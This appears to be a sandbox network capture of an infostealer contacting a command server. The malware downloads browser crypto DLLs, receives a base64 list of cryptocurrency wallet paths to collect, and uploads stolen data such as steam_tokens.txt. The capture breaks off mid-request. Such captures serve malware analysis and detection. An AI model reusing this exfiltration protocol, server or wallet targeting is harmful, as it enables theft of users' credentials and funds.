Nov 7, 2024 04:12:18.080981016 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 04:12:18.296015024 CET	94	OUT	GET /746f34465cf17784/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 7, 2024 04:12:18.577488899 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:18 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 7, 2024 04:12:18.577502966 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVE
Nov 7, 2024 04:12:18.577522039 CET	1236	IN	Data Raw: 85 c0 74 1e 8b 75 1c 8b 7d 14 8b 55 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52 Data Ascii: tu}UMt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8
Nov 7, 2024 04:12:18.577542067 CET	1236	IN	Data Raw: 00 0f 84 98 02 00 00 8b 75 18 85 f6 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24 Data Ascii: uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$
Nov 7, 2024 04:12:18.577553988 CET	424	IN	Data Raw: 89 45 d8 8d 45 dc 89 f9 31 d2 ff 75 1c ff 75 18 53 50 56 8d 45 e0 50 e8 b4 fa ff ff 83 c4 18 89 c7 85 ff 0f 85 6f 01 00 00 b9 01 e0 ff ff 39 5d dc 0f 85 53 01 00 00 8b 55 e0 0f ca b8 a6 59 59 a6 29 d0 81 c2 5a a6 a6 59 09 c2 0f b6 45 e4 0f b6 4d Data Ascii: EE1uuSPVEPo9]SUYY)ZYEME]M)19DEEE\|0)U\|2!!)]\|3)\|3!)
Nov 7, 2024 04:12:18.577635050 CET	1236	IN	Data Raw: 83 c4 0c 8b 45 d8 85 c0 74 0a 53 50 e8 5c 00 08 00 83 c4 08 8b 4d f0 31 e9 e8 9a fe 07 00 89 f8 83 c4 24 5e 5f 5b 5d c3 55 89 e5 53 57 56 8b 75 08 85 f6 74 3a 8b 7d 0c 8b 1e 85 db 74 24 8b 46 04 8b 48 0c ff 15 00 80 0a 10 6a 01 53 ff d1 83 c4 08 Data Ascii: EtSP\M1$^_[]USWVut:}t$FHjShjVPt^_[]^_[]USWV}tVEGGHtIUuu@t0t,GHjShv1
Nov 7, 2024 04:12:18.577647924 CET	1236	IN	Data Raw: ff 83 c4 08 85 c0 74 1c 8b 3e 85 ff 74 20 8b 46 04 8b 48 0c ff 15 00 80 0a 10 6a 01 57 ff d1 83 c4 08 eb 0a 8b 45 ec 8b 4d f0 89 08 31 db 89 d8 83 c4 08 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 8b 75 08 8b 3e 8b 46 04 Data Ascii: t>t FHjWEM1^_[]USWVu>FHW>FHXSVW^_[]USWVu}E@HWVS^_[]USWVPM}G9vhuHuVu
Nov 7, 2024 04:12:18.577660084 CET	424	IN	Data Raw: 01 d7 0f b6 8c 05 f0 fe ff ff 01 f9 0f b6 f9 0f b6 1c 3e 88 1c 06 88 14 3e 83 c0 02 eb b2 66 c7 86 00 01 00 00 00 00 89 f7 8b 4d f0 31 e9 e8 dd f4 07 00 89 f8 81 c4 08 01 00 00 5e 5f 5b 5d c3 55 89 e5 83 7d 0c 00 74 10 68 02 01 00 00 ff 75 08 e8 Data Ascii: >>fM1^_[]U}thuo]UVuE9sh;UMVuPu^]USWV4MEE9EshyU}]E}}
Nov 7, 2024 04:12:18.577975035 CET	1236	IN	Data Raw: 84 ac 00 00 00 8b 45 ec 04 04 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f 88 14 37 8b 75 14 00 d4 0f b6 cc 8b 5d 10 8a 53 03 32 14 0f 8b 4d e4 88 51 03 83 fe 04 74 74 8b 45 ec 04 05 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 Data Ascii: E}$7$7u]S2MQttE}$7$7u]S2MQt<E}$7$7u]S2]SEu0EMME)us) }
Nov 7, 2024 04:12:19.590442896 CET	94	OUT	GET /746f34465cf17784/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 7, 2024 04:12:19.871963024 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:19 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 7, 2024 04:12:20.143059015 CET	95	OUT	GET /746f34465cf17784/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 7, 2024 04:12:20.424550056 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:20 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 7, 2024 04:12:20.708570004 CET	91	OUT	GET /746f34465cf17784/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 7, 2024 04:12:20.989835978 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:20 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 7, 2024 04:12:21.795205116 CET	95	OUT	GET /746f34465cf17784/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 7, 2024 04:12:22.076422930 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:21 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 7, 2024 04:12:22.434218884 CET	99	OUT	GET /746f34465cf17784/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 7, 2024 04:12:22.717513084 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:22 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 7, 2024 04:12:23.236500025 CET	203	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIE Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Nov 7, 2024 04:12:24.018444061 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 04:12:24.069514036 CET	469	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAFCAKEHDHDHIDHDGDH Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 2d 2d 0d 0a Data Ascii: ------CBAFCAKEHDHDHIDHDGDHContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------CBAFCAKEHDHDHIDHDGDHContent-Disposition: form-data; name="message"wallets------CBAFCAKEHDHDHIDHDGDH--
Nov 7, 2024 04:12:24.555279016 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:24 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 7, 2024 04:12:24.558048964 CET	467	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKE Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 2d 2d 0d 0a Data Ascii: ------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="message"files------DBKKFHIEGDHJKECAAKKE--
Nov 7, 2024 04:12:24.841010094 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 04:12:24.852735043 CET	565	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHD Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="file"------FBKEHJEGCFBFHJJKJEHD--
Nov 7, 2024 04:12:25.626311064 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 04:12:25.653570890 CET	474	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGID Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 